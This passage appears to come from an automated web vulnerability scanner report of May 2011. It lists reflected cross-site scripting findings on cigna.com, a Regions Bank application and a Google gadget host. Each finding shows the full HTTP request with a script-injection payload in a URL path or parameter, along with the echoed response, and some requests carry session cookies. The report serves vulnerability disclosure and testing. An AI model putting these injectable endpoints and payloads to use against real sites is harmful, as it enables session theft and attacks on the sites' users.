This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/managers_disability/returnb7469<script>alert(1)</script>2bbe4b818d7/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:42 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/managers_disability/returnb7469<script>alert(1)</script>2bbe4b818d7/index.htm</b>
...[SNIP]...
2.12. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/managers_disability/return/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f8933<script>alert(1)</script>9a9127f6631 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/managers_disability/return/index.htmf8933<script>alert(1)</script>9a9127f6631 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/managers_disability/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:52 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/managers_disability/return/index.htmf8933<script>alert(1)</script>9a9127f6631</b>
...[SNIP]...
2.13. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c0f96<script>alert(1)</script>b776986e18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesc0f96<script>alert(1)</script>b776986e18/toolkit/physicians_disability/home/forms/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:35:09 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sitesc0f96<script>alert(1)</script>b776986e18/toolkit/physicians_disability/home/forms/index.htm</b>
...[SNIP]...
2.14. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 77fcd<script>alert(1)</script>c378a8279f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit77fcd<script>alert(1)</script>c378a8279f4/physicians_disability/home/forms/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:35:21 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit77fcd<script>alert(1)</script>c378a8279f4/physicians_disability/home/forms/index.htm</b>
...[SNIP]...
2.15. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 94c8d<script>alert(1)</script>4fb2e4286a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disability94c8d<script>alert(1)</script>4fb2e4286a4/home/forms/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:35:33 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disability94c8d<script>alert(1)</script>4fb2e4286a4/home/forms/index.htm</b>
...[SNIP]...
2.16. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86a58<script>alert(1)</script>91e4d5dc5f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disability/home86a58<script>alert(1)</script>91e4d5dc5f0/forms/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:35:48 GMT
Content-type: text/html; charset=utf-8
Content-Length: 15812

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disability/home86a58<script>alert(1)</script>91e4d5dc5f0/forms/index.htm</b>
...[SNIP]...
2.17. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41540<script>alert(1)</script>69601a947b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disability/home/forms41540<script>alert(1)</script>69601a947b/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:36:04 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disability/home/forms41540<script>alert(1)</script>69601a947b/index.htm</b>
...[SNIP]...
2.18. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/home/forms/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d458a<script>alert(1)</script>041ca9433a4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disability/home/forms/index.htmd458a<script>alert(1)</script>041ca9433a4 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
Referer: http://cigna.com/sites/toolkit/physicians_disability/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:36:21 GMT
Content-type: text/html; charset=utf-8
Content-Length: 15812

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disability/home/forms/index.htmd458a<script>alert(1)</script>041ca9433a4</b>
...[SNIP]...
2.19. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c04c7<script>alert(1)</script>576bc49dcf7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesc04c7<script>alert(1)</script>576bc49dcf7/toolkit/physicians_disability/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:24 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sitesc04c7<script>alert(1)</script>576bc49dcf7/toolkit/physicians_disability/index.htm</b>
...[SNIP]...
2.20. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9565<script>alert(1)</script>c8671da1275 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkitb9565<script>alert(1)</script>c8671da1275/physicians_disability/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:30 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkitb9565<script>alert(1)</script>c8671da1275/physicians_disability/index.htm</b>
...[SNIP]...
2.21. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d0a8b<script>alert(1)</script>b826c91f132 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disabilityd0a8b<script>alert(1)</script>b826c91f132/index.htm HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:36 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disabilityd0a8b<script>alert(1)</script>b826c91f132/index.htm</b>
...[SNIP]...
2.22. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cigna.com
Path:   /sites/toolkit/physicians_disability/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 644d7<script>alert(1)</script>a7103796015 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/toolkit/physicians_disability/index.htm644d7<script>alert(1)</script>a7103796015 HTTP/1.1
Host: cigna.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1305559782420:ss=1305559757583; __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 404 Not found
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:42 GMT
Content-type: text/html; charset=utf-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<b>/sites/toolkit/physicians_disability/index.htm644d7<script>alert(1)</script>a7103796015</b>
...[SNIP]...
2.23. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 7ddc7%0aalert(1)//83f1733c0b7 was submitted in the url parameter. This input was echoed as 7ddc7
alert(1)//83f1733c0b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://fcgadgets.appspot.com/spec/shareit.xml7ddc7%0aalert(1)//83f1733c0b7&container=peoplesense&parent=http://www.cloudscan.me/&mid=0&view=profile&libs=google.blog&d=0.558.7&lang=en&view-params=%7B%22skin%22:%7B%22FACE_SIZE%22:%2232%22,%22HEIGHT%22:%22200%22,%22TITLE%22:%22%22,%22BORDER_COLOR%22:%22transparent%22,%22ENDCAP_BG_COLOR%22:%22transparent%22,%22ENDCAP_TEXT_COLOR%22:%22%23666666%22,%22ENDCAP_LINK_COLOR%22:%22%233d74a5%22,%22ALTERNATE_BG_COLOR%22:%22transparent%22,%22CONTENT_BG_COLOR%22:%22transparent%22,%22CONTENT_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_SECONDARY_LINK_COLOR%22:%22%233d74a5%22,%22CONTENT_SECONDARY_TEXT_COLOR%22:%22%23666666%22,%22CONTENT_HEADLINE_COLOR%22:%22%23666666%22,%22FONT_FACE%22:%22normal+normal+13px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif%22%7D%7D&communityId=00129212639365482611&caller=http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html HTTP/1.1
Host: ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Mon, 16 May 2011 14:32:50 GMT
Expires: Mon, 16 May 2011 14:32:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 116

Unable to retrieve spec for http://fcgadgets.appspot.com/spec/shareit.xml7ddc7
alert(1)//83f1733c0b7. HTTP error 400
2.24. https://secureapps.regions.com/OAO/DESGetFiles.aspx [files parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /OAO/DESGetFiles.aspx

Issue detail

The value of the files request parameter is copied into the HTML document as plain text between tags. The payload 47833<script>alert(1)</script>52cb1a64e34 was submitted in the files parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /OAO/DESGetFiles.aspx?type=scripts&version=4.0.5.5000&files=0_1_14_24_41_43_48_49_51_5447833<script>alert(1)</script>52cb1a64e34 HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=savings
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555554875:ss=1305555542668; ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: public
Content-Type: text/javascript; charset=utf-8
Expires: Thu, 16 Jun 2011 05:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 15:21:34 GMT
Content-Length: 259

// The files= parameter was tampered with. No files were returned./* Exception:Cannot convert [5447833<script>alert(1)</script>52cb1a64e34] to an integer. Type:System.FormatException files=0_1_14_24_41_43_48_49_51_5447833<script>
...[SNIP]...
2.25. https://sso.corp.cigna.com/corp/sso/professional/controller [DESTINATION parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The value of the DESTINATION request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b12dc"><script>alert(1)</script>64cebfa3f0d was submitted in the DESTINATION parameter. This input was echoed as b12dc"><script>alert(1)</script>64cebfa3f0d in the application's response.

